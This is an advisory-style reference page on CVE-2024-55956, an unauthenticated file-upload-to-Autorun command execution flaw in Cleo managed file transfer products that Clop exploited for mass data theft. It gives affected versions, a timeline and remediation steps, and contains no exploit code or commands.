Search
On this page ▾
CVE-2024-55956 — Cleo Multiple Products Unauthenticated File Upload Vulnerability

CVE-2024-55956

Cleo Harmony/VLTrader/LexiCom — Unauthenticated File Upload/Command Execution via Autorun; Clop Ransomware Mass Exploitation
🔥 CVSS 3.1  9.8 / 10 — CRITICAL 🔴 CISA Known Exploited Vulnerability

What is Cleo Harmony, VLTrader, and LexiCom?

Cleo Harmony, VLTrader, and LexiCom are managed file transfer (MFT) platforms used by enterprises to automate secure data exchange with trading partners, customers, and internal systems. Like similar MFT platforms (MOVEit, GoAnywhere), Cleo products are internet-facing by design to enable automated file transfers. Cleo is particularly common in retail, manufacturing, logistics, and supply chain industries. Clop ransomware has a pattern of mass-exploiting managed file transfer platforms: MOVEit (June 2023), GoAnywhere (Jan–Feb 2023), and now Cleo (December 2024).

Overview

CVE-2024-55956 is an unauthenticated file upload and command execution vulnerability in Cleo Harmony, VLTrader, and LexiCom. An unauthenticated attacker can upload arbitrary files to the Autorun directory via Cleo's file transfer processing path, then leverage Cleo's Autorun feature to execute bash or PowerShell commands from the uploaded files. Clop ransomware exploited this as a zero-day in December 2024 in a mass data theft campaign targeting dozens of organizations, with data extortion threats following initial access.

Affected Versions

Product Vulnerable Fixed
Cleo Harmony ≤ 5.8.0.21 5.8.0.24+
Cleo VLTrader ≤ 5.8.0.21 5.8.0.24+
Cleo LexiCom ≤ 5.8.0.21 5.8.0.24+

Note: A December 8, 2024 patch (5.8.0.22) was bypassed within days; only 5.8.0.24+ fully addresses the vulnerability.

Technical Details

The vulnerability exploits two Cleo features in combination:

  1. Unauthenticated file upload: Cleo's file transfer processing path allows external parties to drop files into designated directories without authentication (this is by design for automated trading partner transfers, but lacks sufficient path restriction)
  2. Autorun directory: Cleo's Autorun feature automatically processes script files placed in the Autorun directory, executing their contents as bash (Linux) or PowerShell (Windows) commands

An attacker sends crafted HTTP requests to drop a malicious script file into the Autorun directory. Cleo's background service automatically picks up and executes the file, running the attacker's commands with the privileges of the Cleo service process.

Clop exploitation technique: Attackers used a two-step approach — first uploading a small "dropper" script via the file transfer path, which then downloaded and executed a larger PowerShell payload performing data exfiltration.

Discovery

Huntress researchers identified mass exploitation on December 10–11, 2024, triggering rapid industry-wide disclosure. Clop ransomware group claimed responsibility for the campaign on December 16, 2024, posting victim data on their extortion portal.

Exploitation Context

Clop ransomware exploited CVE-2024-55956 in a mass data theft campaign — consistent with their prior Accellion FTA (2021), GoAnywhere (2023), and MOVEit (2023) campaigns. Rather than deploying file-encrypting ransomware, Clop focuses on data theft and extortion: they extract sensitive files, then threaten to publish them on their data leak site unless a ransom is paid.

Huntress identified over 4,200 public-facing Cleo instances in early scanning; dozens were confirmed compromised. Industries targeted include retail, food, trucking, and supply chain companies.

Note: CVE-2024-50623 (October 2024, also Cleo, also Clop) is the precursor vulnerability in the same product line.

Remediation

  1. Upgrade to Cleo 5.8.0.24 or later — the December 8 patch (5.8.0.22) was insufficient; only 5.8.0.24 is confirmed complete. The CISA deadline was January 7, 2025.
  2. Immediately disable the Autorun feature if it is not operationally required — this removes the execution mechanism even on unpatched systems.
  3. Restrict Cleo internet exposure — Cleo should only accept connections from known trading partner IP addresses, not from the open internet.
  4. Audit the Autorun directory for unexpected files, particularly scripts dropped between December 3–20, 2024.
  5. Review outbound connections from the Cleo server for data exfiltration indicators — large HTTP/S transfers to unexpected external hosts.
  6. Engage Cleo support for incident response guidance; Clop's data theft operations can proceed quickly after initial access.

Key Details

PropertyValue
CVE ID CVE-2024-55956
Vendor / Product Cleo — Multiple Products
NVD Published2024-12-13
NVD Last Modified2025-11-04
CVSS 3.1 Score9.8
CVSS 3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SeverityCRITICAL
CWE CWE-77 find similar ↗
CISA KEV Added2024-12-17
CISA KEV Deadline2025-01-07
Known Ransomware Use ⚠️ Yes

CVSS 3.1 Breakdown

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Required Action

CISA BOD 22-01 Deadline: 2025-01-07. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

DateEvent
2024-12-08Cleo releases initial patch; insufficient — bypass quickly discovered
2024-12-11Mass exploitation confirmed by Huntress; Clop attribution
2024-12-13CVE published
2024-12-17CISA adds to KEV
2025-01-07CISA BOD 22-01 remediation deadline

References

ResourceType
Cleo Security Update — CVE-2024-55956 Vendor Advisory
NVD — CVE-2024-55956 Vulnerability Database
CISA KEV Catalog Entry US Government
Rapid7 ETR — Cleo Zero-Day CVE-2024-55956 Security Research

Last updated: 2026-05-17

Suggest an update ↗

Gavin Hollinger & AI assembled this air-gap friendly HTML